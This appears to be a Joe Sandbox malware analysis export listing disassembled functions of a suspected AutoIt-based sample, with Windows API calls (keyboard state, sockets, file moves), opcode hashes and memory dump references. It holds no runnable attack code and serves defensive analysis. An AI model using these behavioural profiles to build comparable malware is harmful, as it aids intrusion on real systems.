                                        Function 000F4FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: NULL Pointer assignment$Not an Object type
                                        • API String ID: 0-572801152
                                        • Opcode ID: c1e230b850255567ad3b2fc066c82821ab279bb26c86004ca84242821d5a68db
                                        • Instruction ID: a1ef2c85f9ca96b1a9a772d318116f2747b81780bb1c97ac802106af21880d8c
                                        • Opcode Fuzzy Hash: c1e230b850255567ad3b2fc066c82821ab279bb26c86004ca84242821d5a68db
                                        • Instruction Fuzzy Hash: B1D18E71A0060AAFDB10CF98CC81BBEB7F5BF48345F148169EA15AB681E770E941DB90
                                        Function 000B1522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCPInfo.KERNEL32(?,?), ref: 000B15CE
                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 000B1651
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 000B16E4
                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 000B16FB
                                          • Part of subcall function 000A3820: RtlAllocateHeap.NTDLL(00000000,?,00141444,?,0008FDF5,?,?,0007A976,00000010,00141440,000713FC,?,000713C6,?,00071129), ref: 000A3852
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 000B1777
                                        • __freea.LIBCMT ref: 000B17A2
                                        • __freea.LIBCMT ref: 000B17AE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                        • String ID:
                                        • API String ID: 2829977744-0
                                        • Opcode ID: 07fe767eb4ca41ab5dbce1963f23f77ea7b37d3ccf97ea4f60db1abd72a29d57
                                        • Instruction ID: 923a65fd1c82486decdb93e5c2a084a02db35b07213c7a8c270c881b918fa117
                                        • Opcode Fuzzy Hash: 07fe767eb4ca41ab5dbce1963f23f77ea7b37d3ccf97ea4f60db1abd72a29d57
                                        • Instruction Fuzzy Hash: 1F91B471E146169ADF308FB4C8A1AEEBBF5EF49350F984669E801E7181DB35DD40CBA0
                                        Function 000F4523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInit
                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                        • API String ID: 2610073882-625585964
                                        • Opcode ID: f362e4ed7a42139005fc4278991b90c1e2b33312bfb9869a06077dc8a8aefa84
                                        • Instruction ID: 80a09a42a6cadda2105ac47e57e1604f7cf8ce3a59bd8307dbdebcfc7dc8b2e5
                                        • Opcode Fuzzy Hash: f362e4ed7a42139005fc4278991b90c1e2b33312bfb9869a06077dc8a8aefa84
                                        • Instruction Fuzzy Hash: 68918E71A04219ABDF20DFA5C884FBFBBB8EF46710F108559FA05AB681D7709941DFA0
                                        Function 000E1187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                        Download Yara Rule
                                        APIs
                                        • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 000E125C
                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 000E1284
                                        • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 000E12A8
                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 000E12D8
                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 000E135F
                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 000E13C4
                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 000E1430
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ArraySafe$Data$Access$UnaccessVartype
                                        • String ID:
                                        • API String ID: 2550207440-0
                                        • Opcode ID: 0677c1455887da90b1e9bb1557c935cf3ccab57515b73e068ce5b98716d2aeaa
                                        • Instruction ID: aca3d757485218b0ea91c99874fe9e6e1ae4e649481fe81e7beed595d96ab5e6
                                        • Opcode Fuzzy Hash: 0677c1455887da90b1e9bb1557c935cf3ccab57515b73e068ce5b98716d2aeaa
                                        • Instruction Fuzzy Hash: 7991F3B1A00249AFDB00DFA9C884BFEB7B5FF45314F104029EA51FB292D775A941CB90
                                        Function 0008948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ObjectSelect$BeginCreatePath
                                        • String ID:
                                        • API String ID: 3225163088-0
                                        • Opcode ID: a1c58e3fbb28c29f63d239cf4c4fcb7fe26eccab4b43df597c0aa4c5cea5966a
                                        • Instruction ID: 1363f135c70306952df22168c84460a4dc84d98d87926effe97d426b3d96e07c
                                        • Opcode Fuzzy Hash: a1c58e3fbb28c29f63d239cf4c4fcb7fe26eccab4b43df597c0aa4c5cea5966a
                                        • Instruction Fuzzy Hash: A3911671D00219EFCB50EFA9C884AEEBBB8FF49320F184559E555B7251D374AA81CF60
                                        Function 000F3947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                        Download Yara Rule
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 000F396B
                                        • CharUpperBuffW.USER32(?,?), ref: 000F3A7A
                                        • _wcslen.LIBCMT ref: 000F3A8A
                                        • VariantClear.OLEAUT32(?), ref: 000F3C1F
                                          • Part of subcall function 000E0CDF: VariantInit.OLEAUT32(00000000), ref: 000E0D1F
                                          • Part of subcall function 000E0CDF: VariantCopy.OLEAUT32(?,?), ref: 000E0D28
                                          • Part of subcall function 000E0CDF: VariantClear.OLEAUT32(?), ref: 000E0D34
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                        • API String ID: 4137639002-1221869570
                                        • Opcode ID: 018c0edc69655cf7095b390f5fd2adbf13453e434817c87bf059aaeb5a5d8d26
                                        • Instruction ID: 1ebef709290058be599af20286b5392cfa0c7df6f0318b640e9ae377ef7cccb3
                                        • Opcode Fuzzy Hash: 018c0edc69655cf7095b390f5fd2adbf13453e434817c87bf059aaeb5a5d8d26
                                        • Instruction Fuzzy Hash: 57918974A083099FC714EF24C48196AB7E4FF89324F14892DF9899B352DB31EE45DB92
                                        Function 000F4BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 000D000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,000CFF41,80070057,?,?,?,000D035E), ref: 000D002B
                                          • Part of subcall function 000D000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000CFF41,80070057,?,?), ref: 000D0046
                                          • Part of subcall function 000D000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000CFF41,80070057,?,?), ref: 000D0054
                                          • Part of subcall function 000D000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000CFF41,80070057,?), ref: 000D0064
                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 000F4C51
                                        • _wcslen.LIBCMT ref: 000F4D59
                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 000F4DCF
                                        • CoTaskMemFree.OLE32(?), ref: 000F4DDA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                        • String ID: NULL Pointer assignment
                                        • API String ID: 614568839-2785691316
                                        • Opcode ID: febf34c60f95eea78616b03b97af777a1aad5e1f5a223b6cebda21a6687dc366
                                        • Instruction ID: 14789caaadbc1432f5ffbbf56457909f8d44d4425a007b803c7805392fd46e83
                                        • Opcode Fuzzy Hash: febf34c60f95eea78616b03b97af777a1aad5e1f5a223b6cebda21a6687dc366
                                        • Instruction Fuzzy Hash: 8A911771D0021DAFDF14DFA4C891AEEB7B8BF48310F10816AE919A7251EB749A44DFA0
                                        Function 001020FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetMenu.USER32(?), ref: 00102183
                                        • GetMenuItemCount.USER32(00000000), ref: 001021B5
                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 001021DD
                                        • _wcslen.LIBCMT ref: 00102213
                                        • GetMenuItemID.USER32(?,?), ref: 0010224D
                                        • GetSubMenu.USER32(?,?), ref: 0010225B
                                          • Part of subcall function 000D3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 000D3A57
                                          • Part of subcall function 000D3A3D: GetCurrentThreadId.KERNEL32 ref: 000D3A5E
                                          • Part of subcall function 000D3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000D25B3), ref: 000D3A65
                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001022E3
                                          • Part of subcall function 000DE97B: Sleep.KERNEL32 ref: 000DE9F3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                        • String ID:
                                        • API String ID: 4196846111-0
                                        • Opcode ID: 36487d2b13df04fa7b7160f5ffc9d929d8ded7c0bfa20a730f672d6181f9733a
                                        • Instruction ID: 218dcb95ce6adf3f65b6dd16d1320aa5db3446d533c4108b8c3cfc31d5070279
                                        • Opcode Fuzzy Hash: 36487d2b13df04fa7b7160f5ffc9d929d8ded7c0bfa20a730f672d6181f9733a
                                        • Instruction Fuzzy Hash: F5717175E00205AFCB14EFA4C845AAEB7F5FF48310F158459E89AEB381D774AD418F90
                                        Function 000DAEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetParent.USER32(?), ref: 000DAEF9
                                        • GetKeyboardState.USER32(?), ref: 000DAF0E
                                        • SetKeyboardState.USER32(?), ref: 000DAF6F
                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 000DAF9D
                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 000DAFBC
                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 000DAFFD
                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 000DB020
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessagePost$KeyboardState$Parent
                                        • String ID:
                                        • API String ID: 87235514-0
                                        • Opcode ID: adcc74040cc46d82aa64f367adc1e6c09f584ddb0b3a408f58d5a48683a07c7b
                                        • Instruction ID: e69cbe20b6963c4a373f7ed4290fedb4286738cde82387a48ea76826a73d8599
                                        • Opcode Fuzzy Hash: adcc74040cc46d82aa64f367adc1e6c09f584ddb0b3a408f58d5a48683a07c7b
                                        • Instruction Fuzzy Hash: 6651EEA1A043D17DFB3683348845BBBBEE95B06304F08858AF1D985AC3C3D9A8C8D771
                                        Function 000DACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetParent.USER32(00000000), ref: 000DAD19
                                        • GetKeyboardState.USER32(?), ref: 000DAD2E
                                        • SetKeyboardState.USER32(?), ref: 000DAD8F
                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 000DADBB
                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 000DADD8
                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 000DAE17
                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 000DAE38
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessagePost$KeyboardState$Parent
                                        • String ID:
                                        • API String ID: 87235514-0
                                        • Opcode ID: 5348cf70ec806e7d1897f9683dbe879ced0eabc372c7e7b4e9dcd5c4935bfbee
                                        • Instruction ID: 4e7706e37750cc071754f69a20e763d41d3e1aaf900601957689956780ce5f9a
                                        • Opcode Fuzzy Hash: 5348cf70ec806e7d1897f9683dbe879ced0eabc372c7e7b4e9dcd5c4935bfbee
                                        • Instruction Fuzzy Hash: B151D5A16047D53DFB3683348C55BBA7FE95B47300F08858AE1D646AC3D294EC88E776
                                        Function 000A542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetConsoleCP.KERNEL32(000B3CD6,?,?,?,?,?,?,?,?,000A5BA3,?,?,000B3CD6,?,?), ref: 000A5470
                                        • __fassign.LIBCMT ref: 000A54EB
                                        • __fassign.LIBCMT ref: 000A5506
                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,000B3CD6,00000005,00000000,00000000), ref: 000A552C
                                        • WriteFile.KERNEL32(?,000B3CD6,00000000,000A5BA3,00000000,?,?,?,?,?,?,?,?,?,000A5BA3,?), ref: 000A554B
                                        • WriteFile.KERNEL32(?,?,00000001,000A5BA3,00000000,?,?,?,?,?,?,?,?,?,000A5BA3,?), ref: 000A5584
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                        • String ID:
                                        • API String ID: 1324828854-0
                                        • Opcode ID: 5ce044ad492bb82c8b95de3de62e67e084b970477e73f6e466e8a593c2c0a99a
                                        • Instruction ID: 2f5d8cb626486ae2a067f05bc153d7e2d0e65850c96d29fe6f04745d46a7338b
                                        • Opcode Fuzzy Hash: 5ce044ad492bb82c8b95de3de62e67e084b970477e73f6e466e8a593c2c0a99a
                                        • Instruction Fuzzy Hash: A051AF70E006499FDB11CFA8DC55AEEBBF9FF0A301F14411AF955E7291D6309A41CBA0
                                        Function 000F10B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 000F304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 000F307A
                                          • Part of subcall function 000F304E: _wcslen.LIBCMT ref: 000F309B
                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 000F1112
                                        • WSAGetLastError.WSOCK32 ref: 000F1121
                                        • WSAGetLastError.WSOCK32 ref: 000F11C9
                                        • closesocket.WSOCK32(00000000), ref: 000F11F9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                        • String ID:
                                        • API String ID: 2675159561-0
                                        • Opcode ID: 1dc059014ce38cfd1f35fe70f9e8d299b8e7368829e322a9f2a7c9d542e0f28d
                                        • Instruction ID: eba6731e25b54f059f5732b6d122b490f02dd1740e8f00d757c15be177f084d5
                                        • Opcode Fuzzy Hash: 1dc059014ce38cfd1f35fe70f9e8d299b8e7368829e322a9f2a7c9d542e0f28d
                                        • Instruction Fuzzy Hash: 9A41CF31600208AFDB109F24C884BE9B7E9FF45324F148159FA599B692C774AD818BE1
                                        Function 000DCF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 000DDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,000DCF22,?), ref: 000DDDFD
                                          • Part of subcall function 000DDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,000DCF22,?), ref: 000DDE16
                                        • lstrcmpiW.KERNEL32(?,?), ref: 000DCF45
                                        • MoveFileW.KERNEL32(?,?), ref: 000DCF7F
                                        • _wcslen.LIBCMT ref: 000DD005
                                        • _wcslen.LIBCMT ref: 000DD01B
                                        • SHFileOperationW.SHELL32(?), ref: 000DD061
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                        • String ID: \*.*
                                        • API String ID: 3164238972-1173974218
                                        • Opcode ID: fa35816fab08a30d555e778e236841d35d7fa7f3e3fa5b467e666f4b95c167aa
                                        • Instruction ID: 5aac7ee7fdedffe5af7bbed41f01aebd36ef772d1cdb5786515fc3763b58c96c
                                        • Opcode Fuzzy Hash: fa35816fab08a30d555e778e236841d35d7fa7f3e3fa5b467e666f4b95c167aa
                                        • Instruction Fuzzy Hash: 324135719453195FDF52EBA4C981EDDB7F9AF58380F1000E7E549EB242EA34A688CF60
                                        Function 00102DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00102E1C
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00102E4F
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00102E84
                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00102EB6
                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00102EE0
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00102EF1
                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00102F0B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: LongWindow$MessageSend
                                        • String ID:
                                        • API String ID: 2178440468-0
                                        • Opcode ID: 679cb17382571adb6e55e061a19148b9f9996952594eb767b1d62d0ff70d9f03
                                        • Instruction ID: e1346d06eb0dc5b2ad6388371f9c3d1271d9de56896b3d2930365f4c60f1b6c4
                                        • Opcode Fuzzy Hash: 679cb17382571adb6e55e061a19148b9f9996952594eb767b1d62d0ff70d9f03
                                        • Instruction Fuzzy Hash: 38310434684254AFDB21CF58DC88FA537E5FB9A754F1501A4FA848F6F2CBB1A880DB41
                                        Function 000D7726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000D7769
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000D778F
                                        • SysAllocString.OLEAUT32(00000000), ref: 000D7792
                                        • SysAllocString.OLEAUT32(?), ref: 000D77B0
                                        • SysFreeString.OLEAUT32(?), ref: 000D77B9
                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 000D77DE
                                        • SysAllocString.OLEAUT32(?), ref: 000D77EC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
